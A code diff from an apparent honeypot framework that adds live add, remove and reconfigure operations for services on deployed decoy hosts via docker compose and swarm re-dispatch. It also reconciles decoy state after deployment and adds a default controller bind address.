+    # Build the per-decky state map.  The base container's compose
+    # service name == decky name, which is what we cache on the
+    # TopologyDecky row.  Service containers (named ``<decky>-<svc>``)
+    # don't gate the decky's state — service-level failures are visible
+    # in compose ps separately and don't downgrade the decky as a whole.
+    decky_state_by_name: dict[str, str] = {}
+    for row in ps_rows:
+        state = str(row.get("State", "")).lower()
+        service_name = str(row.get("Service") or "")
+        if service_name and "-" not in service_name:
+            # Plain decky base; cache its docker state.
+            decky_state_by_name[service_name] = state or "unknown"
+        if state and state != "running":
+            name = str(row.get("Name") or row.get("Service") or "?")
+            exit_code = row.get("ExitCode")
+            bad.append(
+                f"{name}={state}"
+                + (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
+            )
+
+    # Reconcile each TopologyDecky.state from compose's view.  Without
+    # this, the row stays at the default 'pending' forever and the
+    # dashboard's ACTIVE DECKIES count reads 0/N even when everything's
+    # actually up.
+    for decky in hydrated["deckies"]:
+        cfg = decky.get("decky_config") or {}
+        decky_name = cfg.get("name") or decky.get("name")
+        if not decky_name:
+            continue
+        ds = decky_state_by_name.get(decky_name, "unknown")
+        new_state = "running" if ds == "running" else "failed"
+        try:
+            await repo.update_topology_decky(
+                decky["uuid"], {"state": new_state},
+            )
+        except Exception as exc:  # noqa: BLE001
+            log.warning(
+                "post-deploy state reconcile failed topology=%s decky=%s: %s",
+                topology_id, decky_name, exc,
+            )
+
+    if bad:
+        reason = "post-deploy check: " + ", ".join(bad[:8]) + (
+            f" and {len(bad) - 8} more" if len(bad) > 8 else ""
+        )
+        await transition_status(
+            repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
+        )
+        log.warning(
+            "topology %s deployed but %d container(s) unhealthy: %s",
+            topology_id, len(bad), reason,
+        )
+    else:
+        await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
+        log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
+
+    # Best-effort canary baseline seed across every decky in the
+    # topology.  Same resilience contract as the fleet path: failures
+    # surface as state=failed token rows, never abort the deploy.
+    try:
+        from decnet.canary import planter as _canary_planter
+        await _canary_planter.seed_baseline_topology(repo, topology_id)
+    except Exception as exc:  # noqa: BLE001
+        log.warning(
+            "canary baseline seed failed (best-effort) topology=%s err=%s",
+            topology_id, exc,
+        )


@_traced("engine.teardown_topology")
--- a/decnet/engine/services_live.py
+++ b/decnet/engine/services_live.py
@@ -0,0 +1,673 @@
+"""Add/remove a single service on a deployed decky without full redeploy.
+
+The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
+supports per-service targeting (``up --no-deps -d <svc>``,
+``stop <svc>``, ``rm -f <svc>``).  What was missing was the
+orchestration: regenerate the compose file (so future redeploys reflect
+the change), persist the new ``services`` list, and run the targeted
+compose command.
+
+Two scopes:
+
+* **Topology** — source of truth is the ``topology_deckies`` table; the
+  compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
+* **Fleet** — source of truth is ``decnet-state.json`` (with the
+  ``fleet_deckies`` table mirroring it); compose is the unihost
+  ``decnet-compose.yml``.
+
+Both publish ``decky.<name>.service.added`` /
+``decky.<name>.service.removed`` on the bus.  The new topic constants
+are documented in ``wiki-checkout/Service-Bus.md``.
+"""
+from __future__ import annotations
+
+import subprocess  # nosec B404
+from pathlib import Path
+from typing import Any, Literal, Optional
+
+import anyio
+
+from decnet.bus import topics
+from decnet.logging import get_logger
+from decnet.services.base import BaseService
+from decnet.services.registry import get_service
+from decnet.topology.persistence import hydrate
+from decnet.web.db.repository import BaseRepository
+
+# Heavy imports (composer/deployer pull in decnet.network → docker) are
+# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
+# / ``_load_state`` indirection helpers below.  Mirrors the lazy-import
+# pattern in decnet.canary.planter for the same reason.
+
+
+def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
+    """Forward to :func:`decnet.engine.deployer._compose`, resolved at call time.
+
+    Kept as a module-level seam so tests can
+    ``monkeypatch.setattr(services_live, '_compose', ...)``, and so the
+    deployer is not imported when this module is.  When *compose_file*
+    is ``None`` the keyword is left out, letting the deployer's own
+    default apply.
+    """
+    from decnet.engine.deployer import _compose as _real_compose
+    forwarded = {"env": env}
+    if compose_file is not None:
+        forwarded["compose_file"] = compose_file
+    _real_compose(*args, **forwarded)
+
+
+def _topology_compose_path(topology_id: str) -> Path:
+    """Delegate to ``decnet.engine.deployer._topology_compose_path`` (imported at call time)."""
+    from decnet.engine.deployer import _topology_compose_path as _real_path
+    return _real_path(topology_id)
+
+
+def _write_topology_compose(hydrated, path: Path) -> Path:
+    """Delegate to ``decnet.topology.compose.write_topology_compose`` (imported at call time)."""
+    from decnet.topology.compose import write_topology_compose
+    return write_topology_compose(hydrated, path)
+
+
+def _load_state():
+    """Delegate to ``decnet.config.load_state`` (imported at call time)."""
+    from decnet.config import load_state as _real_load_state
+    return _real_load_state()
+
+
+def _save_state(config, compose_path) -> None:
+    """Delegate to ``decnet.config.save_state`` (imported at call time)."""
+    from decnet.config import save_state as _real_save_state
+    _real_save_state(config, compose_path)
+
+
+def _write_compose(config, compose_path) -> None:
+    """Delegate to ``decnet.composer.write_compose``; its return value is discarded."""
+    from decnet.composer import write_compose as _real_write_compose
+    _real_write_compose(config, compose_path)
+
+
+def _get_bus():
+    """Delegate to ``decnet.bus.factory.get_bus`` (imported at call time)."""
+    from decnet.bus.factory import get_bus
+    return get_bus()
+
+
+# --------------------------- swarm propagation helpers ---------------------------
+#
+# Service mutations (add/remove/update_config) on a deployed decky used to run
+# the master's local docker-compose only.  For swarm fleet deckies the master
+# has no containers; for agent-targeted topologies the master only writes a
+# compose file the worker never sees.  These helpers replay the change to the
+# worker so the env actually lands.
+#
+# Lazy imports keep this module's import graph clean (composer/swarm pull in
+# decnet.network → docker, mirroring the pattern used elsewhere in this file).
+
+
+async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
+    """Look up the ``host_uuid`` recorded on the first shard row for *decky_name*.
+
+    Returns ``None`` when no shard row names the decky, or when the
+    matching row has no ``host_uuid`` key.
+    """
+    rows = await repo.list_decky_shards()
+    return next(
+        (row.get("host_uuid") for row in rows if row.get("decky_name") == decky_name),
+        None,
+    )
+
+
+async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
+    """Send one swarm host its current slice of the fleet config.
+
+    Loads the master's fleet state, keeps only the deckies whose
+    ``host_uuid`` attribute equals *host_uuid*, and passes a copy of the
+    config restricted to those deckies to ``dispatch_decnet_config``.
+    Logs a warning and returns without dispatching when there is no
+    fleet state, or when no decky in it belongs to the host.
+    """
+    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
+
+    loaded = _load_state()
+    if loaded is None:
+        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
+        return
+    config, _ = loaded
+    shard = []
+    for decky in config.deckies:
+        if getattr(decky, "host_uuid", None) == host_uuid:
+            shard.append(decky)
+    if len(shard) == 0:
+        log.warning(
+            "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
+            host_uuid,
+        )
+        return
+    await dispatch_decnet_config(config.model_copy(update={"deckies": shard}), repo)
+
+
+async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
+    """Forward to the deployer's ``resync_agent_topology`` for agent-pinned topologies.
+
+    A topology that cannot be hydrated, or whose ``topology`` record has
+    no truthy ``target_host_uuid``, is left alone.
+    """
+    from decnet.engine.deployer import resync_agent_topology
+
+    snapshot = await hydrate(repo, topology_id)
+    pinned = snapshot is not None and bool(
+        snapshot.get("topology", {}).get("target_host_uuid")
+    )
+    if pinned:
+        # Unpinned (unihost) topologies rely on the local compose file instead.
+        await resync_agent_topology(repo, topology_id)
+
+
+log = get_logger("engine.services_live")
+
+DeckyKind = Literal["fleet", "topology"]
+
+
+class ServiceMutationError(ValueError):
+    """Base class for service add/remove failures the caller can correct.
+
+    The API layer (not part of this module) is expected to choose a 4xx
+    status from the concrete subclass; the base class maps to 422.
+    """
+
+
+class ServiceNotFoundError(ServiceMutationError):
+    """The named decky or topology does not exist (maps to 404)."""
+
+
+class ServiceConflictError(ServiceMutationError):
+    """Idempotency violation: service already on, or not on, the decky (maps to 409)."""
+
+
+def _validate_service_for_per_decky(name: str) -> BaseService:
+    """Return the registered service *name*, or raise ``ServiceMutationError``.
+
+    Two cases are rejected:
+
+    * the registry does not know *name* — signalled either by
+      ``KeyError`` or by a ``None`` result;
+    * the service is ``fleet_singleton`` — such services run once per
+      fleet (e.g. an LLMNR responder), so a per-decky add/remove is
+      refused instead of silently producing a no-op compose entry.
+    """
+    try:
+        svc = get_service(name)
+    except KeyError as exc:
+        raise ServiceMutationError(f"unknown service {name!r}") from exc
+    if svc is None:
+        # Some call sites treat a ``None`` return from the registry as
+        # "not registered".  Handle that here too, so it cannot surface
+        # as an AttributeError on the attribute access below.
+        raise ServiceMutationError(f"unknown service {name!r}")
+    if svc.fleet_singleton:
+        raise ServiceMutationError(
+            f"service {name!r} is fleet_singleton; not addable per-decky"
+        )
+    return svc
+
+
+async def _publish(topic: str, payload: dict[str, Any]) -> None:
+    """Best-effort publish of *payload* on *topic*; never raises.
+
+    Obtains a bus, connects, publishes, and closes it.  Any exception
+    along the way is logged as a warning and swallowed, so a bus outage
+    cannot fail the mutation that triggered the event.
+    """
+    try:
+        bus = _get_bus()
+        await bus.connect()
+        try:
+            await bus.publish(topic, payload)
+        finally:
+            # Close once connected even if publish raised; previously a
+            # failed publish skipped close() and leaked the connection.
+            await bus.close()
+    except Exception as e:  # noqa: BLE001
+        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
+
+
+# ---------------------------------------------------------- topology path
+
+
+async def _topology_decky(
+    repo: BaseRepository, topology_id: str, decky_name: str,
+) -> dict[str, Any]:
+    """Fetch the hydrated row of *decky_name* inside *topology_id*.
+
+    A row matches on ``decky_config.name`` when that is set, otherwise
+    on its top-level ``name``.  Raises ``ServiceNotFoundError`` when the
+    topology cannot be hydrated or holds no matching decky.
+    """
+    topo = await hydrate(repo, topology_id)
+    if topo is None:
+        raise ServiceNotFoundError(f"topology {topology_id!r} not found")
+
+    def _label(row: dict[str, Any]) -> Any:
+        return (row.get("decky_config") or {}).get("name") or row.get("name")
+
+    hit = next((row for row in topo["deckies"] if _label(row) == decky_name), None)
+    if hit is None:
+        raise ServiceNotFoundError(
+            f"decky {decky_name!r} is not in topology {topology_id!r}"
+        )
+    return hit
+
+
+async def _rerender_topology_compose(
+    repo: BaseRepository, topology_id: str,
+) -> Path:
+    """Hydrate *topology_id* again and rewrite its compose file; return the path.
+
+    Meant to run after the DB has been updated, so the file on disk
+    matches the new service set — otherwise a later ``up -d`` would
+    bring a removed service back.  Raises ``ServiceNotFoundError`` if
+    the topology can no longer be hydrated.
+    """
+    fresh = await hydrate(repo, topology_id)
+    if fresh is None:  # pragma: no cover — narrow race
+        raise ServiceNotFoundError(
+            f"topology {topology_id!r} disappeared mid-mutation"
+        )
+    compose_file = _topology_compose_path(topology_id)
+    _write_topology_compose(fresh, compose_file)
+    return compose_file
+
+
+async def _add_topology_service(
+    repo: BaseRepository,
+    topology_id: str,
+    decky_name: str,
+    service_name: str,
+    initial_config: dict | None = None,
+) -> list[str]:
+    """Add *service_name* to a topology decky and bring its container up.
+
+    Order of operations: persist the new ``services`` list (plus
+    *initial_config*, when given) on the decky row, re-render the
+    topology compose file, then either resync the worker (agent-pinned
+    topology) or run ``compose up`` for the single new service locally.
+    No rollback is attempted here if a later step raises.
+
+    Returns the decky's updated services list.
+
+    Raises:
+        ServiceNotFoundError: topology or decky not found.
+        ServiceConflictError: the service is already on the decky.
+    """
+    decky = await _topology_decky(repo, topology_id, decky_name)
+    services: list[str] = list(decky.get("services") or [])
+    if service_name in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} already on decky {decky_name!r}"
+        )
+    services.append(service_name)
+    update: dict[str, Any] = {"services": services}
+    # If the caller supplied initial config, fold it into decky_config
+    # BEFORE compose regen so the first ``up`` materialises the env on
+    # the new container — no follow-up apply needed.
+    if initial_config:
+        # Copy both levels so the hydrated row is not mutated in place.
+        cfg_blob = dict(decky.get("decky_config") or {})
+        sc = dict(cfg_blob.get("service_config") or {})
+        sc[service_name] = initial_config
+        cfg_blob["service_config"] = sc
+        update["decky_config"] = cfg_blob
+    await repo.update_topology_decky(decky["uuid"], update)
+
+    compose_path = await _rerender_topology_compose(repo, topology_id)
+    if await _topology_is_agent_pinned(repo, topology_id):
+        # Agent-pinned: the master's local compose has nothing to up.
+        # Push the new hydrated blob to the worker.
+        await _resync_agent_topology(repo, topology_id)
+    else:
+        # Compose service name for a decky's service: "<decky>-<service>".
+        target = f"{decky_name}-{service_name}"
+        # Run compose in a worker thread so the API event loop stays
+        # responsive — same pattern as engine/deployer.deploy_topology.
+        await anyio.to_thread.run_sync(
+            lambda: _compose(
+                "up", "-d", "--no-deps", "--build", target,
+                compose_file=compose_path,
+            ),
+        )
+    return services
+
+
+async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
+    """Report whether the hydrated topology has a truthy ``target_host_uuid``.
+
+    A topology that cannot be hydrated counts as not pinned.
+    """
+    snapshot = await hydrate(repo, topology_id)
+    if snapshot is not None:
+        return bool(snapshot.get("topology", {}).get("target_host_uuid"))
+    return False
+
+
+async def _remove_topology_service(
+    repo: BaseRepository,
+    topology_id: str,
+    decky_name: str,
+    service_name: str,
+) -> list[str]:
+    """Remove *service_name* from a topology decky and tear its container down.
+
+    For a locally-run topology the container is stopped and removed
+    first, using the compose file as it currently exists on disk; only
+    then is the shortened ``services`` list persisted and the compose
+    file re-rendered.  For an agent-pinned topology no local compose
+    command runs; the change is persisted, re-rendered, and pushed to
+    the worker.
+
+    Returns the decky's remaining services.
+
+    Raises:
+        ServiceNotFoundError: topology or decky not found.
+        ServiceConflictError: the service is not on the decky.
+    """
+    decky = await _topology_decky(repo, topology_id, decky_name)
+    services: list[str] = list(decky.get("services") or [])
+    if service_name not in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    services = [s for s in services if s != service_name]
+    # Compose service name for a decky's service: "<decky>-<service>".
+    target = f"{decky_name}-{service_name}"
+    compose_path = _topology_compose_path(topology_id)
+    agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
+    if not agent_pinned:
+        # Stop + rm before persisting + re-rendering so a half-completed
+        # mutation leaves the operator a clear state to retry from
+        # (container still running; DB still says service is on).
+        await anyio.to_thread.run_sync(
+            lambda: _compose("stop", target, compose_file=compose_path),
+        )
+        await anyio.to_thread.run_sync(
+            lambda: _compose("rm", "-f", target, compose_file=compose_path),
+        )
+    await repo.update_topology_decky(decky["uuid"], {"services": services})
+    await _rerender_topology_compose(repo, topology_id)
+    if agent_pinned:
+        # Worker tears down the removed service when it diffs the
+        # incoming hydrated blob against its current state.
+        await _resync_agent_topology(repo, topology_id)
+    return services
+
+
+# ---------------------------------------------------------- fleet path
+
+
+def _fleet_state_or_raise() -> tuple[Any, Path]:
+    """Return what ``_load_state()`` yields, or raise if it yields ``None``."""
+    loaded = _load_state()
+    if loaded is not None:
+        return loaded
+    raise ServiceMutationError(
+        "no fleet state on disk — run `decnet up` first"
+    )
+
+
+def _fleet_find_decky(config: Any, decky_name: str) -> Any:
+    """Return the first entry of ``config.deckies`` named ``decky_name``.
+
+    Raises ``ServiceNotFoundError`` when no decky carries that name.
+    """
+    found = next(
+        (candidate for candidate in config.deckies if candidate.name == decky_name),
+        None,
+    )
+    if found is None:
+        raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
+    return found
+
+
+async def _persist_fleet_change(
+    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
+) -> None:
+    """Persist the mutation to JSON state, compose file, and the DB row.
+
+    State is loaded again here and the decky is looked up again by name,
+    so the object that gets saved (``target``) is not necessarily the
+    caller's ``decky``. Anything the caller staged on ``decky`` has to be
+    copied across explicitly or it is dropped on the floor: ``services``
+    arrives as an argument, and ``service_config`` (staged by
+    ``_add_fleet_service`` when an initial config is supplied) is carried
+    over below.
+
+    Raises ``ServiceMutationError`` if the state can no longer be loaded
+    and ``ServiceNotFoundError`` if the decky is no longer part of it.
+    """
+    # _fleet_state_or_raise turns a vanished state file into a typed error
+    # instead of a TypeError from unpacking None.
+    config, _ = _fleet_state_or_raise()
+    target = _fleet_find_decky(config, decky.name)
+    target.services = services
+    if target is not decky:
+        staged_cfg = getattr(decky, "service_config", None)
+        if staged_cfg is not None:
+            # Without this the compose file and DB row are written from a
+            # decky that never saw the caller's service_config change.
+            target.service_config = staged_cfg
+    _save_state(config, compose_path)
+    _write_compose(config, compose_path)
+    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
+    # change without waiting for the reconciler.
+    from decnet.web.db.models import LOCAL_HOST_SENTINEL
+    await repo.upsert_fleet_decky({
+        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
+        "name": decky.name,
+        "services": services,
+        "decky_config": target.model_dump(mode="json"),
+        "decky_ip": decky.ip,
+        "state": "running",
+    })
+
+
+async def _add_fleet_service(
+    repo: BaseRepository,
+    decky_name: str,
+    service_name: str,
+    initial_config: dict | None = None,
+) -> list[str]:
+    """Add ``service_name`` to a fleet decky and return the new services list.
+
+    Raises ``ServiceMutationError`` when there is no fleet state,
+    ``ServiceNotFoundError`` when the decky is unknown, and
+    ``ServiceConflictError`` when the service is already on the decky.
+
+    After persisting, a decky that resolves to a swarm host gets that
+    host's shard re-dispatched; otherwise the new service container is
+    brought up locally via compose in a worker thread.
+    """
+    config, compose_path = _fleet_state_or_raise()
+    decky = _fleet_find_decky(config, decky_name)
+    services: list[str] = list(decky.services or [])
+    if service_name in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} already on decky {decky_name!r}"
+        )
+    services.append(service_name)
+    if initial_config:
+        # Same path as _update_fleet_service_config: stash the validated
+        # cfg on the decky model so the compose write picks it up.
+        # NOTE(review): _persist_fleet_change calls _load_state() again and
+        # saves the decky it finds there — verify that the service_config
+        # staged on this object actually reaches the one being saved.
+        sc = dict(getattr(decky, "service_config", None) or {})
+        sc[service_name] = initial_config
+        decky.service_config = sc
+    await _persist_fleet_change(repo, decky, services, compose_path)
+    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
+    if swarm_host_uuid:
+        # Master has no container for this decky — re-push the host's
+        # shard so the worker materialises the new service.
+        await _redispatch_fleet_shard(repo, swarm_host_uuid)
+    else:
+        target = f"{decky_name}-{service_name}"
+        await anyio.to_thread.run_sync(
+            lambda: _compose(
+                "up", "-d", "--no-deps", "--build", target,
+                compose_file=compose_path,
+            ),
+        )
+    return services
+
+
+async def _remove_fleet_service(
+    repo: BaseRepository, decky_name: str, service_name: str,
+) -> list[str]:
+    """Remove ``service_name`` from a fleet decky and return what is left.
+
+    Raises ``ServiceMutationError`` when there is no fleet state,
+    ``ServiceNotFoundError`` when the decky is unknown, and
+    ``ServiceConflictError`` when the service is not on the decky.
+
+    The swarm host lookup happens before anything is changed because it
+    decides whether local containers are touched at all.
+    """
+    config, compose_path = _fleet_state_or_raise()
+    decky = _fleet_find_decky(config, decky_name)
+    services: list[str] = list(decky.services or [])
+    if service_name not in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    services = [s for s in services if s != service_name]
+    target = f"{decky_name}-{service_name}"
+    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
+    if not swarm_host_uuid:
+        # Local: stop+rm before persist so the operator has a clear retry
+        # state if compose fails halfway. Swarm: skip — the worker's compose
+        # will handle the removal when the redispatched config drops the
+        # service from the decky.
+        await anyio.to_thread.run_sync(
+            lambda: _compose("stop", target, compose_file=compose_path),
+        )
+        await anyio.to_thread.run_sync(
+            lambda: _compose("rm", "-f", target, compose_file=compose_path),
+        )
+    await _persist_fleet_change(repo, decky, services, compose_path)
+    if swarm_host_uuid:
+        # Re-push only after the state no longer lists the service.
+        await _redispatch_fleet_shard(repo, swarm_host_uuid)
+    return services
+
+
+# ---------------------------------------------------------- public api
+
+
+async def add_service(
+    repo: BaseRepository,
+    *,
+    decky_kind: DeckyKind,
+    decky_name: str,
+    service_name: str,
+    topology_id: Optional[str] = None,
+    config: dict | None = None,
+) -> list[str]:
+    """Attach *service_name* to an already-deployed decky.
+
+    The service name goes through ``_validate_service_for_per_decky`` and
+    a non-empty ``config`` (same dict shape PUT/POST .../config accepts)
+    goes through the service's ``validate_cfg`` before any state is
+    written, so a 400-class failure leaves zero side-effects. The
+    kind-specific helper then persists the change, regenerates the
+    compose file and brings ``<decky>-<service>`` up; finally
+    ``decky.<name>.service.added`` is published on the bus.
+
+    Raises ``ServiceMutationError`` when ``decky_kind`` is ``"topology"``
+    and no ``topology_id`` was supplied.
+
+    Returns the services list as it stands after the addition.
+    """
+    svc = _validate_service_for_per_decky(service_name)
+    initial_config = {} if not config else svc.validate_cfg(config)
+
+    if decky_kind == "fleet":
+        services = await _add_fleet_service(
+            repo, decky_name, service_name,
+            initial_config=initial_config,
+        )
+    elif decky_kind == "topology":
+        if not topology_id:
+            raise ServiceMutationError(
+                "decky_kind=topology requires topology_id",
+            )
+        services = await _add_topology_service(
+            repo, topology_id, decky_name, service_name,
+            initial_config=initial_config,
+        )
+    else:  # pragma: no cover — Literal narrows
+        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
+
+    topic = topics.decky(decky_name, topics.DECKY_SERVICE_ADDED)
+    event = {
+        "decky_name": decky_name,
+        "service_name": service_name,
+        "topology_id": topology_id,
+        "services": services,
+    }
+    await _publish(topic, event)
+    log.info(
+        "services_live.add decky=%s topology=%s service=%s",
+        decky_name, topology_id, service_name,
+    )
+    return services
+
+
+async def update_service_config(
+    repo: BaseRepository,
+    *,
+    decky_kind: DeckyKind,
+    decky_name: str,
+    service_name: str,
+    cfg: dict,
+    apply: bool = False,
+    topology_id: Optional[str] = None,
+) -> dict:
+    """Store ``cfg`` as the decky's new ``service_config[service_name]``.
+
+    ``cfg`` is run through the service's ``validate_cfg`` (unknown keys
+    dropped, types coerced) BEFORE any write, so a 400-class failure
+    leaves zero side-effects.
+
+    ``apply=False`` (Save):  the DB row and compose file are updated; the
+                             running container keeps its old env.
+    ``apply=True``  (Apply): same persistence, followed by a force-recreate
+                             of ``<decky>-<service>`` so the container picks
+                             up the new env.  Destructive: any in-container
+                             session state on that service is lost.
+
+    Raises ``ServiceMutationError`` when ``decky_kind`` is ``"topology"``
+    and no ``topology_id`` was supplied.
+
+    Returns the validated cfg that was stored.
+    """
+    svc = _validate_service_for_per_decky(service_name)
+    validated = svc.validate_cfg(cfg)
+
+    if decky_kind == "fleet":
+        await _update_fleet_service_config(
+            repo, decky_name, service_name, validated, apply=apply,
+        )
+    elif decky_kind == "topology":
+        if not topology_id:
+            raise ServiceMutationError(
+                "decky_kind=topology requires topology_id",
+            )
+        await _update_topology_service_config(
+            repo, topology_id, decky_name, service_name, validated, apply=apply,
+        )
+    else:  # pragma: no cover
+        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
+
+    topic = topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED)
+    event = {
+        "decky_name": decky_name,
+        "service_name": service_name,
+        "topology_id": topology_id,
+        "service_config": validated,
+        "recreated": bool(apply),
+    }
+    await _publish(topic, event)
+    log.info(
+        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
+        decky_name, topology_id, service_name, apply,
+    )
+    return validated
+
+
+async def _update_topology_service_config(
+    repo: BaseRepository,
+    topology_id: str,
+    decky_name: str,
+    service_name: str,
+    validated: dict,
+    *,
+    apply: bool,
+) -> None:
+    """Write ``validated`` into a topology decky's ``service_config``.
+
+    Raises ``ServiceConflictError`` when the service is not on the decky.
+    The decky row and compose file are always updated; with ``apply`` the
+    topology is additionally resynced to its agent (agent-pinned) or the
+    service container is force-recreated locally.
+    """
+    decky = await _topology_decky(repo, topology_id, decky_name)
+    present = decky.get("services") or []
+    if service_name not in present:
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+
+    # Work on copies so the row returned by the repo is not mutated.
+    blob = dict(decky.get("decky_config") or {})
+    per_service = dict(blob.get("service_config") or {})
+    per_service[service_name] = validated
+    blob["service_config"] = per_service
+    await repo.update_topology_decky(decky["uuid"], {"decky_config": blob})
+
+    compose_path = await _rerender_topology_compose(repo, topology_id)
+    if not apply:
+        return
+    if await _topology_is_agent_pinned(repo, topology_id):
+        await _resync_agent_topology(repo, topology_id)
+        return
+
+    target = f"{decky_name}-{service_name}"
+
+    def _recreate():
+        return _compose(
+            "up", "-d", "--no-deps", "--force-recreate", "--build", target,
+            compose_file=compose_path,
+        )
+
+    await anyio.to_thread.run_sync(_recreate)
+
+
+async def _update_fleet_service_config(
+    repo: BaseRepository,
+    decky_name: str,
+    service_name: str,
+    validated: dict,
+    *,
+    apply: bool,
+) -> None:
+    """Write ``validated`` into a fleet decky's ``service_config``.
+
+    Raises ``ServiceMutationError`` when there is no fleet state,
+    ``ServiceNotFoundError`` when the decky is unknown, and
+    ``ServiceConflictError`` when the service is not on the decky.
+
+    The JSON state, compose file and DB row are always updated. With
+    ``apply`` the change is also pushed to the running service: a shard
+    re-dispatch for a decky on a swarm host, otherwise a local
+    remove-then-recreate of ``<decky>-<service>``.
+    """
+    config, compose_path = _fleet_state_or_raise()
+    decky = _fleet_find_decky(config, decky_name)
+    if service_name not in (decky.services or []):
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    # Copy before editing so the existing mapping is replaced, not mutated.
+    sc = dict(getattr(decky, "service_config", None) or {})
+    sc[service_name] = validated
+    decky.service_config = sc
+    # ``decky`` belongs to ``config``, so saving ``config`` persists the edit.
+    _save_state(config, compose_path)
+    _write_compose(config, compose_path)
+    from decnet.web.db.models import LOCAL_HOST_SENTINEL
+    await repo.upsert_fleet_decky({
+        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
+        "name": decky.name,
+        "services": list(decky.services or []),
+        "decky_config": decky.model_dump(mode="json"),
+        "decky_ip": decky.ip,
+        "state": "running",
+    })
+    if apply:
+        swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
+        if swarm_host_uuid:
+            await _redispatch_fleet_shard(repo, swarm_host_uuid)
+        else:
+            target = f"{decky_name}-{service_name}"
+            # Docker Compose tracks the previous container by ID. If that
+            # container was already removed (or renamed during a prior failed
+            # deploy), --force-recreate fails with "No such container". Pre-
+            # remove by name so Compose starts from a clean slate.
+            # The result of this ``docker rm`` is not inspected, so a
+            # failure here (e.g. nothing to remove) does not abort the apply.
+            await anyio.to_thread.run_sync(
+                lambda: subprocess.run(  # nosec B603 B607
+                    ["docker", "rm", "-f", target],
+                    capture_output=True,
+                ),
+            )
+            await anyio.to_thread.run_sync(
+                lambda: _compose(
+                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
+                    compose_file=compose_path,
+                ),
+            )
+
+
+async def remove_service(
+    repo: BaseRepository,
+    *,
+    decky_kind: DeckyKind,
+    decky_name: str,
+    service_name: str,
+    topology_id: Optional[str] = None,
+) -> list[str]:
+    """Detach *service_name* from a deployed decky.
+
+    The kind-specific helper stops and removes the service container,
+    stores the shortened services list and re-renders the compose file
+    (so a later ``up -d`` does not resurrect the service). Afterwards
+    ``decky.<name>.service.removed`` is published.
+
+    Raises ``ServiceMutationError`` when ``decky_kind`` is ``"topology"``
+    and no ``topology_id`` was supplied.
+
+    Returns the services list as it stands after the removal.
+    """
+    if decky_kind == "fleet":
+        services = await _remove_fleet_service(repo, decky_name, service_name)
+    elif decky_kind == "topology":
+        if not topology_id:
+            raise ServiceMutationError(
+                "decky_kind=topology requires topology_id",
+            )
+        services = await _remove_topology_service(
+            repo, topology_id, decky_name, service_name,
+        )
+    else:  # pragma: no cover
+        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
+
+    topic = topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED)
+    event = {
+        "decky_name": decky_name,
+        "service_name": service_name,
+        "topology_id": topology_id,
+        "services": services,
+    }
+    await _publish(topic, event)
+    log.info(
+        "services_live.remove decky=%s topology=%s service=%s",
+        decky_name, topology_id, service_name,
+    )
+    return services
--- a/decnet/env.py
+++ b/decnet/env.py
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
 # DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
 # updater / swarmctl subcommands (which never touch auth) can start without
 # the master's JWT secret being present in the environment.
-DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
+DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")

 # Agent-side RFC 5424 sink written by decnet.collector.worker when run on
 # a SWARM worker.  The forwarder tails this file and ships lines over
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
 DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
 DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
 DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
+# Bind address for the master-side swarm controller. Loopback by default —
+# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
+# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
+# swarmctl-host in /etc/decnet/decnet.ini.
+DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")

 # Ingester batching: how many log rows to accumulate per commit, and the
